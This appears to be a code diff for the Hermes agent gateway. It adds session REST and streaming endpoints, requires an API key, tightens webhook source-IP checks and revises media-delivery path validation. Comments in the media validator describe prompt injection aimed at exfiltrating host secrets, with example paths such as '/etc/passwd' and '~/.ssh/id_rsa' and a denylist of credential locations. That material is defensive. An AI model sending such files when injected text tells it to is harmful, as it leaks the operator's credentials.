)
data: List[Dict[str, Any]] = []
for name, label, desc in _get_effective_configurable_toolsets():
try:
tools = sorted(set(resolve_toolset(name)))
except Exception:
tools = []
is_enabled = name in enabled_toolsets
data.append({
"name": name,
"label": label,
"description": desc,
"enabled": is_enabled,
"configured": _toolset_has_keys(name, config),
"tools": tools,
})
except Exception:
logger.exception("GET /v1/toolsets failed")
return web.json_response(
_openai_error("Failed to enumerate toolsets", err_type="server_error"),
status=500,
)
return web.json_response({
"object": "list",
"platform": "api_server",
"data": data,
})
# ------------------------------------------------------------------
# /api/sessions — thin client/session resource API
# ------------------------------------------------------------------
@staticmethod
def _parse_nonnegative_int(value: Any, default: int, maximum: int) -> int:
try:
parsed = int(value)
except (TypeError, ValueError):
return default
if parsed < 0:
return default
return min(parsed, maximum)
@staticmethod
def _session_response(session: Dict[str, Any]) -> Dict[str, Any]:
"""Return a stable, client-safe session representation."""
safe_keys = (
"id", "source", "user_id", "model", "title", "started_at", "ended_at",
"end_reason", "message_count", "tool_call_count", "input_tokens",
"output_tokens", "cache_read_tokens", "cache_write_tokens",
"reasoning_tokens", "estimated_cost_usd", "actual_cost_usd",
"api_call_count", "parent_session_id", "last_active", "preview",
"_lineage_root_id",
)
payload = {key: session.get(key) for key in safe_keys if key in session}
# Avoid exposing full system prompts/model_config through the client API;
# callers only need to know whether those snapshots exist.
payload["has_system_prompt"] = bool(session.get("system_prompt"))
payload["has_model_config"] = bool(session.get("model_config"))
return payload
@staticmethod
def _message_response(message: Dict[str, Any]) -> Dict[str, Any]:
safe_keys = (
"id", "session_id", "role", "content", "tool_call_id", "tool_calls",
"tool_name", "timestamp", "token_count", "finish_reason", "reasoning",
"reasoning_content",
)
return {key: message.get(key) for key in safe_keys if key in message}
async def _read_json_body(self, request: "web.Request") -> tuple[Dict[str, Any], Optional["web.Response"]]:
try:
body = await request.json()
except Exception:
return {}, web.json_response(_openai_error("Invalid JSON in request body"), status=400)
if not isinstance(body, dict):
return {}, web.json_response(_openai_error("Request body must be a JSON object"), status=400)
return body, None
def _get_existing_session_or_404(self, session_id: str) -> tuple[Optional[Dict[str, Any]], Optional["web.Response"]]:
db = self._ensure_session_db()
if db is None:
return None, web.json_response(_openai_error("Session database unavailable", code="session_db_unavailable"), status=503)
session = db.get_session(session_id)
if not session:
return None, web.json_response(_openai_error(f"Session not found: {session_id}", code="session_not_found"), status=404)
return session, None
def _conversation_history_for_session(self, session_id: str) -> List[Dict[str, Any]]:
db = self._ensure_session_db()
if db is None:
return []
try:
return db.get_messages_as_conversation(session_id)
except Exception as exc:
logger.warning("Failed to load session history for %s: %s", session_id, exc)
return []
async def _handle_list_sessions(self, request: "web.Request") -> "web.Response":
"""GET /api/sessions — list persisted Hermes sessions."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
db = self._ensure_session_db()
if db is None:
return web.json_response(_openai_error("Session database unavailable", code="session_db_unavailable"), status=503)
limit = self._parse_nonnegative_int(request.query.get("limit"), default=50, maximum=200)
offset = self._parse_nonnegative_int(request.query.get("offset"), default=0, maximum=1_000_000)
source = request.query.get("source") or None
include_children = _coerce_request_bool(request.query.get("include_children"), default=False)
sessions = db.list_sessions_rich(
source=source,
limit=limit,
offset=offset,
include_children=include_children,
order_by_last_active=True,
)
return web.json_response({
"object": "list",
"data": [self._session_response(s) for s in sessions],
"limit": limit,
"offset": offset,
"has_more": len(sessions) == limit,
})
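The `limit`/`offset` handling in `_handle_list_sessions` can be sketched in isolation. This is a minimal illustration, not the server code: `paginate` and the in-memory `rows` list are hypothetical stand-ins for `db.list_sessions_rich`, and only the clamp function mirrors the static method shown above.

```python
from typing import Any, Dict, List, Tuple


def parse_nonnegative_int(value: Any, default: int, maximum: int) -> int:
    """Same clamp as the static method above: bad or negative input falls back to `default`."""
    try:
        parsed = int(value)
    except (TypeError, ValueError):
        return default
    if parsed < 0:
        return default
    return min(parsed, maximum)


def paginate(rows: List[str], query: Dict[str, str]) -> Tuple[List[str], bool]:
    """Hypothetical in-memory stand-in for the DB call plus the `has_more` heuristic."""
    limit = parse_nonnegative_int(query.get("limit"), default=50, maximum=200)
    offset = parse_nonnegative_int(query.get("offset"), default=0, maximum=1_000_000)
    page = rows[offset:offset + limit]
    # A full page is taken as a hint that more rows may follow.
    return page, len(page) == limit


rows = [f"s{i}" for i in range(5)]
first, more_first = paginate(rows, {"limit": "2"})
last, more_last = paginate(rows, {"limit": "2", "offset": "4"})
```

Because `has_more` is inferred from a full page, a final page that happens to contain exactly `limit` rows still reports `has_more` as true; a client would discover the end only on the next, empty request.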
async def _handle_create_session(self, request: "web.Request") -> "web.Response":
"""POST /api/sessions — create an empty Hermes session row."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
body, err = await self._read_json_body(request)
if err:
return err
db = self._ensure_session_db()
if db is None:
return web.json_response(_openai_error("Session database unavailable", code="session_db_unavailable"), status=503)
raw_id = body.get("id") or body.get("session_id")
session_id = str(raw_id).strip() if raw_id else f"api_{int(time.time())}_{uuid.uuid4().hex[:8]}"
if not session_id or re.search(r'[\r\n\x00]', session_id):
return web.json_response(_openai_error("Invalid session ID", code="invalid_session_id"), status=400)
if len(session_id) > self._MAX_SESSION_HEADER_LEN:
return web.json_response(_openai_error("Session ID too long", code="invalid_session_id"), status=400)
if db.get_session(session_id):
return web.json_response(_openai_error(f"Session already exists: {session_id}", code="session_exists"), status=409)
model = body.get("model") or self._model_name
system_prompt = body.get("system_prompt")
if system_prompt is not None and not isinstance(system_prompt, str):
return web.json_response(_openai_error("system_prompt must be a string", code="invalid_system_prompt"), status=400)
db.create_session(session_id, "api_server", model=str(model) if model else None, system_prompt=system_prompt)
title = body.get("title")
if title is not None:
try:
db.set_session_title(session_id, str(title))
except ValueError as exc:
db.delete_session(session_id)
return web.json_response(_openai_error(str(exc), code="invalid_title"), status=400)
session = db.get_session(session_id) or {"id": session_id, "source": "api_server", "model": model, "title": title}
return web.json_response({"object": "hermes.session", "session": self._session_response(session)}, status=201)
async def _handle_get_session(self, request: "web.Request") -> "web.Response":
"""GET /api/sessions/{session_id}."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
session, err = self._get_existing_session_or_404(request.match_info["session_id"])
if err:
return err
return web.json_response({"object": "hermes.session", "session": self._session_response(session)})
async def _handle_patch_session(self, request: "web.Request") -> "web.Response":
"""PATCH /api/sessions/{session_id} — update client-safe session metadata."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
session_id = request.match_info["session_id"]
session, err = self._get_existing_session_or_404(session_id)
if err:
return err
body, err = await self._read_json_body(request)
if err:
return err
allowed = {"title", "end_reason"}
unknown = sorted(set(body) - allowed)
if unknown:
return web.json_response(_openai_error(f"Unsupported session fields: {', '.join(unknown)}", code="unsupported_session_field"), status=400)
db = self._ensure_session_db()
if "title" in body:
try:
db.set_session_title(session_id, "" if body["title"] is None else str(body["title"]))
except ValueError as exc:
return web.json_response(_openai_error(str(exc), code="invalid_title"), status=400)
if body.get("end_reason"):
db.end_session(session_id, str(body["end_reason"]))
session = db.get_session(session_id) or session
return web.json_response({"object": "hermes.session", "session": self._session_response(session)})
async def _handle_delete_session(self, request: "web.Request") -> "web.Response":
"""DELETE /api/sessions/{session_id}."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
session_id = request.match_info["session_id"]
session, err = self._get_existing_session_or_404(session_id)
if err:
return err
db = self._ensure_session_db()
deleted = db.delete_session(session_id)
return web.json_response({"object": "hermes.session.deleted", "id": session_id, "deleted": bool(deleted)})
async def _handle_session_messages(self, request: "web.Request") -> "web.Response":
"""GET /api/sessions/{session_id}/messages."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
session_id = request.match_info["session_id"]
_, err = self._get_existing_session_or_404(session_id)
if err:
return err
db = self._ensure_session_db()
messages = db.get_messages(session_id)
return web.json_response({
"object": "list",
"session_id": session_id,
"data": [self._message_response(m) for m in messages],
})
async def _handle_fork_session(self, request: "web.Request") -> "web.Response":
"""POST /api/sessions/{session_id}/fork — branch via current SessionDB primitives."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
source_id = request.match_info["session_id"]
source, err = self._get_existing_session_or_404(source_id)
if err:
return err
body, err = await self._read_json_body(request)
if err:
return err
db = self._ensure_session_db()
fork_id = str(body.get("id") or body.get("session_id") or f"api_{int(time.time())}_{uuid.uuid4().hex[:8]}").strip()
if not fork_id or re.search(r'[\r\n\x00]', fork_id):
return web.json_response(_openai_error("Invalid session ID", code="invalid_session_id"), status=400)
if db.get_session(fork_id):
return web.json_response(_openai_error(f"Session already exists: {fork_id}", code="session_exists"), status=409)
# Match the CLI /branch semantics: mark the original as branched, then
# create a child session that carries the transcript forward. This uses
# SessionDB's native parent_session_id/end_reason visibility model rather
# than inventing a parallel fork store.
db.end_session(source_id, "branched")
db.create_session(
fork_id,
"api_server",
model=source.get("model"),
system_prompt=source.get("system_prompt"),
parent_session_id=source_id,
)
messages = db.get_messages(source_id)
db.replace_messages(fork_id, messages)
title = body.get("title")
if title is None:
base = source.get("title") or "fork"
try:
title = db.get_next_title_in_lineage(base)
except Exception:
title = f"{base} fork"
try:
db.set_session_title(fork_id, str(title))
except ValueError as exc:
return web.json_response(_openai_error(str(exc), code="invalid_title"), status=400)
fork = db.get_session(fork_id) or {"id": fork_id, "parent_session_id": source_id}
return web.json_response({"object": "hermes.session", "session": self._session_response(fork)}, status=201)
async def _handle_session_chat(self, request: "web.Request") -> "web.Response":
"""POST /api/sessions/{session_id}/chat — one synchronous agent turn."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
gateway_session_key, key_err = self._parse_session_key_header(request)
if key_err is not None:
return key_err
session_id = request.match_info["session_id"]
_, err = self._get_existing_session_or_404(session_id)
if err:
return err
body, err = await self._read_json_body(request)
if err:
return err
user_message, err = _session_chat_user_message(body)
if err is not None:
return err
system_prompt = body.get("system_message") or body.get("instructions")
if system_prompt is not None and not isinstance(system_prompt, str):
return web.json_response(_openai_error("system_message must be a string", code="invalid_system_message"), status=400)
history = self._conversation_history_for_session(session_id)
result, usage = await self._run_agent(
user_message=user_message,
conversation_history=history,
ephemeral_system_prompt=system_prompt,
session_id=session_id,
gateway_session_key=gateway_session_key,
)
effective_session_id = result.get("session_id") if isinstance(result, dict) else session_id
final_response = result.get("final_response", "") if isinstance(result, dict) else ""
headers = {"X-Hermes-Session-Id": effective_session_id or session_id}
if gateway_session_key:
headers["X-Hermes-Session-Key"] = gateway_session_key
return web.json_response(
{
"object": "hermes.session.chat.completion",
"session_id": effective_session_id or session_id,
"message": {"role": "assistant", "content": final_response},
"usage": usage,
},
headers=headers,
)
async def _handle_session_chat_stream(self, request: "web.Request") -> "web.StreamResponse":
"""POST /api/sessions/{session_id}/chat/stream — SSE wrapper over _run_agent."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
gateway_session_key, key_err = self._parse_session_key_header(request)
if key_err is not None:
return key_err
session_id = request.match_info["session_id"]
_, err = self._get_existing_session_or_404(session_id)
if err:
return err
body, err = await self._read_json_body(request)
if err:
return err
user_message, err = _session_chat_user_message(body)
if err is not None:
return err
system_prompt = body.get("system_message") or body.get("instructions")
if system_prompt is not None and not isinstance(system_prompt, str):
return web.json_response(_openai_error("system_message must be a string", code="invalid_system_message"), status=400)
loop = asyncio.get_running_loop()
queue: "asyncio.Queue[Optional[tuple[str, Dict[str, Any]]]]" = asyncio.Queue()
message_id = f"msg_{uuid.uuid4().hex}"
run_id = f"run_{uuid.uuid4().hex}"
seq = 0
def _event_payload(name: str, payload: Dict[str, Any]) -> tuple[str, Dict[str, Any]]:
nonlocal seq
seq += 1
payload.setdefault("session_id", session_id)
payload.setdefault("run_id", run_id)
payload.setdefault("seq", seq)
payload.setdefault("ts", time.time())
return name, payload
def _enqueue(name: str, payload: Dict[str, Any]) -> None:
event = _event_payload(name, payload)
try:
running_loop = asyncio.get_running_loop()
except RuntimeError:
running_loop = None
try:
if running_loop is loop:
queue.put_nowait(event)
else:
loop.call_soon_threadsafe(queue.put_nowait, event)
except RuntimeError:
pass
def _delta(delta: str) -> None:
if delta:
_enqueue("assistant.delta", {"message_id": message_id, "delta": delta})
def _tool_progress(event_type: str, tool_name: str = None, preview: str = None, args=None, **kwargs) -> None:
if event_type == "reasoning.available":
_enqueue("tool.progress", {"message_id": message_id, "tool_name": tool_name or "_thinking", "delta": preview or ""})
elif event_type in {"tool.started", "tool.completed", "tool.failed"}:
event_name = event_type.replace("tool.", "tool.")
_enqueue(event_name, {"message_id": message_id, "tool_name": tool_name, "preview": preview, "args": args})
async def _run_and_signal() -> None:
try:
await queue.put(_event_payload("run.started", {"user_message": {"role": "user", "content": user_message}}))
await queue.put(_event_payload("message.started", {"message": {"id": message_id, "role": "assistant"}}))
history = self._conversation_history_for_session(session_id)
result, usage = await self._run_agent(
user_message=user_message,
conversation_history=history,
ephemeral_system_prompt=system_prompt,
session_id=session_id,
stream_delta_callback=_delta,
tool_progress_callback=_tool_progress,
gateway_session_key=gateway_session_key,
)
final_response = result.get("final_response", "") if isinstance(result, dict) else ""
effective_session_id = result.get("session_id", session_id) if isinstance(result, dict) else session_id
await queue.put(_event_payload("assistant.completed", {
"session_id": effective_session_id,
"message_id": message_id,
"content": final_response,
"completed": True,
"partial": False,
"interrupted": False,
}))
await queue.put(_event_payload("run.completed", {
"session_id": effective_session_id,
"message_id": message_id,
"completed": True,
"usage": usage,
}))
except Exception as exc:
logger.exception("[api_server] session chat stream failed")
await queue.put(_event_payload("error", {"message": str(exc)}))
finally:
await queue.put(_event_payload("done", {}))
await queue.put(None)
task = asyncio.create_task(_run_and_signal())
try:
self._background_tasks.add(task)
except TypeError:
pass
if hasattr(task, "add_done_callback"):
task.add_done_callback(self._background_tasks.discard)
headers = {
"Content-Type": "text/event-stream",
"Cache-Control": "no-cache",
"X-Accel-Buffering": "no",
"X-Hermes-Session-Id": session_id,
}
if gateway_session_key:
headers["X-Hermes-Session-Key"] = gateway_session_key
response = web.StreamResponse(status=200, headers=headers)
await response.prepare(request)
last_write = time.monotonic()
try:
while True:
try:
item = await asyncio.wait_for(queue.get(), timeout=CHAT_COMPLETIONS_SSE_KEEPALIVE_SECONDS)
except asyncio.TimeoutError:
await response.write(b": keepalive\n\n")
last_write = time.monotonic()
continue
if item is None:
break
name, payload = item
data = json.dumps(payload, ensure_ascii=False)
await response.write(f"event: {name}\ndata: {data}\n\n".encode("utf-8"))
last_write = time.monotonic()
except (asyncio.CancelledError, ConnectionResetError):
task.cancel()
raise
except Exception as exc:
logger.debug("[api_server] session SSE stream error: %s", exc)
return response
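A client consuming `/api/sessions/{session_id}/chat/stream` has to split the stream into frames and ignore keepalive comments. The following is a minimal sketch, assuming the wire format written by the handler above (one `event:` line, one `data:` line holding JSON, a blank line as terminator, and `: keepalive` comment frames). `parse_sse_frames` is a hypothetical helper and not part of Hermes.

```python
import json
from typing import Any, Dict, Iterator, Tuple


def parse_sse_frames(raw: str) -> Iterator[Tuple[str, Dict[str, Any]]]:
    """Yield (event_name, payload) pairs from already-decoded SSE text.

    Hypothetical helper: assumes one `event:` and one `data:` line per frame.
    """
    for frame in raw.split("\n\n"):
        name = None
        data = None
        for line in frame.split("\n"):
            if line.startswith(":"):
                # Comment line such as ": keepalive"; it carries no event.
                continue
            if line.startswith("event: "):
                name = line[len("event: "):]
            elif line.startswith("data: "):
                data = line[len("data: "):]
        if name is not None and data is not None:
            yield name, json.loads(data)


sample = (
    'event: run.started\ndata: {"seq": 1}\n\n'
    ": keepalive\n\n"
    'event: assistant.delta\ndata: {"seq": 2, "delta": "Hi"}\n\n'
    'event: done\ndata: {"seq": 3}\n\n'
)
events = list(parse_sse_frames(sample))
```

A real client would feed this incrementally from the HTTP response body and stop once the `done` event arrives; the sketch works on a complete string only to keep the framing logic visible.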
async def _handle_chat_completions(self, request: "web.Request") -> "web.Response":
"""POST /v1/chat/completions — OpenAI Chat Completions format."""
auth_err = self._check_auth(request)
@@ -3486,12 +4048,24 @@ class APIServerAdapter(BasePlatformAdapter):
try:
mws = [mw for mw in (cors_middleware, body_limit_middleware, security_headers_middleware) if mw is not None]
self._app = web.Application(middlewares=mws, client_max_size=MAX_REQUEST_BYTES)
self._app["api_server_adapter"] = self
assert self._app is not None
self._app.router.add_get("/health", self._handle_health)
self._app.router.add_get("/health/detailed", self._handle_health_detailed)
self._app.router.add_get("/v1/health", self._handle_health)
self._app.router.add_get("/v1/models", self._handle_models)
self._app.router.add_get("/v1/capabilities", self._handle_capabilities)
self._app.router.add_get("/v1/skills", self._handle_skills)
self._app.router.add_get("/v1/toolsets", self._handle_toolsets)
# Session/client control surface (thin wrappers over SessionDB + _run_agent)
self._app.router.add_get("/api/sessions", self._handle_list_sessions)
self._app.router.add_post("/api/sessions", self._handle_create_session)
self._app.router.add_get("/api/sessions/{session_id}", self._handle_get_session)
self._app.router.add_patch("/api/sessions/{session_id}", self._handle_patch_session)
self._app.router.add_delete("/api/sessions/{session_id}", self._handle_delete_session)
self._app.router.add_get("/api/sessions/{session_id}/messages", self._handle_session_messages)
self._app.router.add_post("/api/sessions/{session_id}/fork", self._handle_fork_session)
self._app.router.add_post("/api/sessions/{session_id}/chat", self._handle_session_chat)
self._app.router.add_post("/api/sessions/{session_id}/chat/stream", self._handle_session_chat_stream)
self._app.router.add_post("/v1/chat/completions", self._handle_chat_completions)
self._app.router.add_post("/v1/responses", self._handle_responses)
self._app.router.add_get("/v1/responses/{response_id}", self._handle_get_response)
@@ -3511,6 +4085,12 @@ class APIServerAdapter(BasePlatformAdapter):
self._app.router.add_get("/v1/runs/{run_id}/events", self._handle_run_events)
self._app.router.add_post("/v1/runs/{run_id}/approval", self._handle_run_approval)
self._app.router.add_post("/v1/runs/{run_id}/stop", self._handle_stop_run)
# Store the adapter after native routes are registered. Local Hermes-Relay
# bootstrap shims use this key as a feature-detection hook; registering
# native routes first lets those shims no-op instead of shadowing the
# upstream session-control handlers.
self._app["api_server_adapter"] = self
# Start background sweep to clean up orphaned (unconsumed) run streams
sweep_task = asyncio.create_task(self._sweep_orphaned_runs())
try:
@@ -3520,11 +4100,13 @@ class APIServerAdapter(BasePlatformAdapter):
if hasattr(sweep_task, "add_done_callback"):
sweep_task.add_done_callback(self._background_tasks.discard)
# Refuse to start network-accessible without authentication
if is_network_accessible(self._host) and not self._api_key:
# Refuse to start without authentication. The API server can
# dispatch terminal-capable agent work, so every deployment needs
# an explicit API_SERVER_KEY regardless of bind address.
if not self._api_key:
logger.error(
"[%s] Refusing to start: binding to %s requires API_SERVER_KEY. "
"Set API_SERVER_KEY or use the default 127.0.0.1.",
"[%s] Refusing to start: API_SERVER_KEY is required for the API server, "
"including loopback-only binds on %s.",
self.name, self._host,
)
return False
@@ -3562,14 +4144,6 @@ class APIServerAdapter(BasePlatformAdapter):
await self._site.start()
self._mark_connected()
if not self._api_key:
logger.warning(
"[%s] ⚠️ No API key configured (API_SERVER_KEY / platforms.api_server.key). "
"All requests will be accepted without authentication. "
"Set an API key for production deployments to prevent "
"unauthorized access to sessions, responses, and cron jobs.",
self.name,
)
logger.info(
"[%s] API server listening on http://%s:%d (model: %s)",
self.name, self._host, self._port, self._model_name,
+52 -7
@@ -829,6 +829,13 @@ _HERMES_HOME = get_hermes_home()
MEDIA_DELIVERY_ALLOW_DIRS_ENV = "HERMES_MEDIA_ALLOW_DIRS"
MEDIA_DELIVERY_TRUST_RECENT_ENV = "HERMES_MEDIA_TRUST_RECENT_FILES"
MEDIA_DELIVERY_TRUST_RECENT_SECONDS_ENV = "HERMES_MEDIA_TRUST_RECENT_SECONDS"
# Strict mode toggles the original allowlist+recency path-validation behavior.
# Off by default — symmetric with inbound (we accept any document type the
# user uploads), and with the denylist still blocking obvious credential /
# system paths. Operators running public-facing gateways where prompt
# injection from one user could exfiltrate the host's secrets to that same
# user should set this to true.
MEDIA_DELIVERY_STRICT_ENV = "HERMES_MEDIA_DELIVERY_STRICT"
MEDIA_DELIVERY_SAFE_ROOTS = (
IMAGE_CACHE_DIR,
AUDIO_CACHE_DIR,
@@ -918,6 +925,21 @@ def _media_delivery_recency_seconds() -> float:
return float(_MEDIA_DELIVERY_TRUST_RECENT_DEFAULT_SECONDS)
def _media_delivery_strict_mode() -> bool:
"""Return True when path validation should require allowlist/recency match.
Off by default. In non-strict mode, ``validate_media_delivery_path``
accepts any existing regular file that isn't under the credential /
system-path denylist, restoring the pre-#29523 behavior for the
single-user case. Strict mode preserves the original
allowlist+recency-window logic for operators running public-facing
gateways where prompt injection from one user shouldn't be able to
exfiltrate the host's secrets to that same user.
"""
raw = os.environ.get(MEDIA_DELIVERY_STRICT_ENV, "0").strip().lower()
return raw in ("1", "true", "yes", "on")
def _media_delivery_denied_paths() -> List[Path]:
"""Return absolute denylist paths under which delivery is never allowed."""
denied = [Path(p) for p in _MEDIA_DELIVERY_DENIED_PREFIXES]
@@ -972,10 +994,22 @@ def _path_is_within(path: Path, root: Path) -> bool:
def validate_media_delivery_path(path: str) -> Optional[str]:
"""Return a safe absolute file path for native media delivery, else None.
MEDIA tags and bare local paths in model output are untrusted text. Only
existing regular files under Hermes-managed media caches, or roots the
operator explicitly allowlists, may be uploaded as native attachments.
Symlinks are resolved before the containment check.
Default mode (single-user / private gateway): accept any existing regular
file that isn't under the credential / system-path denylist
(``_MEDIA_DELIVERY_DENIED_PREFIXES`` + ``~/.ssh``, ``~/.aws``, etc.).
This mirrors inbound delivery: Telegram/Discord/Slack
will hand the agent any file the user uploads, and the agent can hand
back any file that isn't a credential.
Strict mode (opt-in via ``gateway.strict`` in ``config.yaml`` or
``HERMES_MEDIA_DELIVERY_STRICT=1``): the file MUST live under a
Hermes-managed cache, under an operator-allowlisted root
(``HERMES_MEDIA_ALLOW_DIRS``), or be freshly produced inside the
configured recency window. Suitable for public-facing bots where
prompt injection from one user shouldn't be able to exfiltrate the
host's secrets to that same user.
Symlinks are resolved before any containment / denylist check.
"""
if not path:
return None
@@ -999,6 +1033,8 @@ def validate_media_delivery_path(path: str) -> Optional[str]:
if not resolved.is_file():
return None
# Cache / operator allowlist is always honored — these are unconditionally
# trusted regardless of mode.
for root in _media_delivery_allowed_roots():
try:
resolved_root = root.expanduser().resolve(strict=False)
@@ -1007,9 +1043,18 @@ def validate_media_delivery_path(path: str) -> Optional[str]:
if _path_is_within(resolved, resolved_root):
return str(resolved)
# Outside the cache/operator allowlist: fall back to recency-based trust
# for files the agent has just produced (e.g. ``pandoc -o /tmp/report.pdf``
# or ``write_file("/home/user/report.pdf", ...)``). System paths and
# Non-strict mode (default): accept anything not on the denylist.
# The denylist still blocks /etc, /proc, ~/.ssh, ~/.aws, ~/.hermes/.env,
# ~/.hermes/auth.json, etc. — so the obvious prompt-injection sites
# (``MEDIA:/etc/passwd``, ``MEDIA:~/.ssh/id_rsa``) remain rejected.
if not _media_delivery_strict_mode():
if _path_under_denied_prefix(resolved):
return None
return str(resolved)
# Strict mode: fall back to recency-based trust for freshly-produced
# files (e.g. ``pandoc -o /tmp/report.pdf`` or
# ``write_file("/home/user/report.pdf", ...)``). System paths and
# credential locations remain blocked even when "recent" — see
# ``_MEDIA_DELIVERY_DENIED_PREFIXES`` for the denylist.
window = _media_delivery_recency_seconds()
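The decision order described in the comments above (allowlisted roots first, then the denylist, then either unconditional acceptance or the recency check) can be sketched as a pure function. This is an illustration under stated assumptions, not the actual `validate_media_delivery_path`: `decide_delivery`, its parameters, and the `is_recent` flag are hypothetical, and the filesystem checks (existence, symlink resolution) are omitted.

```python
from pathlib import PurePosixPath
from typing import Iterable, Optional


def _within(path: PurePosixPath, root: PurePosixPath) -> bool:
    """True when `path` equals `root` or sits below it."""
    try:
        path.relative_to(root)
        return True
    except ValueError:
        return False


def decide_delivery(
    resolved: PurePosixPath,
    allowed_roots: Iterable[PurePosixPath],
    denied_prefixes: Iterable[PurePosixPath],
    strict: bool,
    is_recent: bool,
) -> Optional[str]:
    """Hypothetical condensation of the two modes; returns the path or None."""
    # 1. Cache / operator allowlist is honored in both modes.
    if any(_within(resolved, root) for root in allowed_roots):
        return str(resolved)
    # 2. Credential / system paths are rejected in both modes.
    if any(_within(resolved, denied) for denied in denied_prefixes):
        return None
    # 3. Non-strict accepts the rest; strict additionally requires recency.
    if not strict:
        return str(resolved)
    return str(resolved) if is_recent else None


cache = [PurePosixPath("/var/hermes/cache")]
denied = [PurePosixPath("/etc"), PurePosixPath("/home/u/.ssh")]
report = PurePosixPath("/home/u/report.pdf")
```

With these inputs, `report` is delivered in non-strict mode and in strict mode only when `is_recent` is true, while `/etc/passwd` is rejected in every combination.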
+20 -2
@@ -25,6 +25,7 @@ from gateway.platforms.base import (
MessageEvent,
MessageType,
SendResult,
is_network_accessible,
)
logger = logging.getLogger(__name__)
@@ -132,12 +133,24 @@ class MSGraphWebhookAdapter(BasePlatformAdapter):
def set_notification_scheduler(self, scheduler: Optional[NotificationScheduler]) -> None:
self._notification_scheduler = scheduler
def _source_allowlist_required_but_missing(self) -> bool:
return is_network_accessible(self._host) and not self._allowed_source_networks
async def connect(self) -> bool:
if self._client_state is None:
logger.error(
"[msgraph_webhook] Refusing to start without extra.client_state configured"
)
return False
if self._source_allowlist_required_but_missing():
logger.error(
"[msgraph_webhook] Refusing to start: binding to %s requires "
"extra.allowed_source_cidrs. Configure the Microsoft Graph "
"source CIDRs or bind to loopback (127.0.0.1/::1) behind a "
"tunnel or reverse proxy.",
self._host,
)
return False
app = web.Application()
app.router.add_get(self._health_path, self._handle_health)
@@ -177,6 +190,8 @@ class MSGraphWebhookAdapter(BasePlatformAdapter):
return {"name": chat_id, "type": "webhook"}
async def _handle_health(self, request: "web.Request") -> "web.Response":
if not self._source_ip_allowed(request):
return web.Response(status=403)
return web.json_response(
{
"status": "ok",
@@ -271,9 +286,12 @@ class MSGraphWebhookAdapter(BasePlatformAdapter):
def _source_ip_allowed(self, request: "web.Request") -> bool:
"""Return True if the request's source IP is in the configured allowlist.
When ``allowed_source_cidrs`` is empty (the default), everything is
allowed, which preserves behavior for dev tunnels / localhost setups.
Loopback-only binds may omit ``allowed_source_cidrs`` for local reverse
proxies and dev tunnels. Network-accessible binds fail closed until an
explicit CIDR allowlist is configured.
"""
if self._source_allowlist_required_but_missing():
return False
if not self._allowed_source_networks:
return True
peer = request.remote or ""
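The fail-closed rule for the webhook allowlist can be sketched with the standard `ipaddress` module. This is a minimal illustration, assuming that "network-accessible" means "not a loopback bind"; `is_loopback_host` is a hypothetical stand-in for the negation of `is_network_accessible`, and the CIDR matching is an assumption about the part of `_source_ip_allowed` not shown in this hunk.

```python
import ipaddress
from typing import List, Union

Network = Union[ipaddress.IPv4Network, ipaddress.IPv6Network]


def is_loopback_host(host: str) -> bool:
    """Hypothetical stand-in for `not is_network_accessible(host)`."""
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        # Unknown hostnames are treated as network-accessible.
        return False


def source_ip_allowed(bind_host: str, peer: str, allowed: List[Network]) -> bool:
    """Allow a peer only if it matches the allowlist, or the bind is loopback-only."""
    if not allowed:
        # Empty allowlist: acceptable on loopback binds, refused otherwise.
        return is_loopback_host(bind_host)
    try:
        addr = ipaddress.ip_address(peer)
    except ValueError:
        return False
    return any(addr in net for net in allowed)


nets = [ipaddress.ip_network("203.0.113.0/24")]
```

For example, `source_ip_allowed("0.0.0.0", "203.0.113.5", [])` is refused because the bind is network-accessible and no allowlist exists, while the same peer is accepted once `nets` is supplied.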
+18 -6
@@ -240,7 +240,7 @@ def _render_table_block_for_telegram(table_block: list[str]) -> str:
first_data_row = _split_markdown_table_row(table_block[2]) if len(table_block) > 2 else []
has_row_label_col = len(first_data_row) == len(headers) + 1
rendered_rows: list[str] = []
rendered_groups: list[str] = []
for index, row in enumerate(table_block[2:], start=1):
cells = _split_markdown_table_row(row)
if has_row_label_col:
@@ -258,12 +258,24 @@ def _render_table_block_for_telegram(table_block: list[str]) -> str:
elif len(data_cells) > len(headers):
data_cells = data_cells[: len(headers)]
rendered_rows.append(f"**{heading}**")
rendered_rows.extend(
f"{header}: {value}" for header, value in zip(headers, data_cells)
)
# Build the bulleted lines for this row. Skip any bullet whose value
# duplicates the heading text -- when has_row_label_col is False the
# heading IS the first data cell, and emitting it twice (once as the
# bold heading, once as the first bullet) is visual noise.
bullets: list[str] = []
for header, value in zip(headers, data_cells):
if not has_row_label_col and value == heading:
continue
bullets.append(f"{header}: {value}")
return "\n\n".join(rendered_rows)
# Within a row-group: single newline between heading and its bullets,
# and between successive bullets. This keeps the row visually tight
# on Telegram instead of stretching each bullet into its own paragraph.
group_lines = [f"**{heading}**", *bullets]
rendered_groups.append("\n".join(group_lines))
# Between row-groups: blank line so each group reads as a distinct block.
return "\n\n".join(rendered_groups)
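The new grouping behavior can be sketched for the case without a separate row-label column. This is a simplified illustration, assuming the first cell of each row doubles as the heading, as the comment above describes; `render_row_groups` is a hypothetical helper and omits the cell padding and truncation the real function performs.

```python
from typing import List


def render_row_groups(headers: List[str], rows: List[List[str]]) -> str:
    """Render each row as a bold heading followed by `header: value` lines."""
    groups: List[str] = []
    for cells in rows:
        heading = cells[0]  # assumption: no dedicated row-label column
        bullets = [
            f"{header}: {value}"
            for header, value in zip(headers, cells)
            if value != heading  # skip the line that would repeat the heading
        ]
        # Single newlines inside a group keep it visually tight.
        groups.append("\n".join([f"**{heading}**", *bullets]))
    # A blank line separates one row-group from the next.
    return "\n\n".join(groups)


text = render_row_groups(
    ["Name", "Role"],
    [["Ada", "Engineer"], ["Bob", "Designer"]],
)
```

Here `text` contains two groups separated by a blank line, and neither group repeats the name as a `Name: ...` line under its own heading.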
def _wrap_markdown_tables(text: str) -> str:
+12 -2
@@ -17,7 +17,17 @@ import logging
import socket as _socket
import time
from typing import Any, Dict, List, Optional
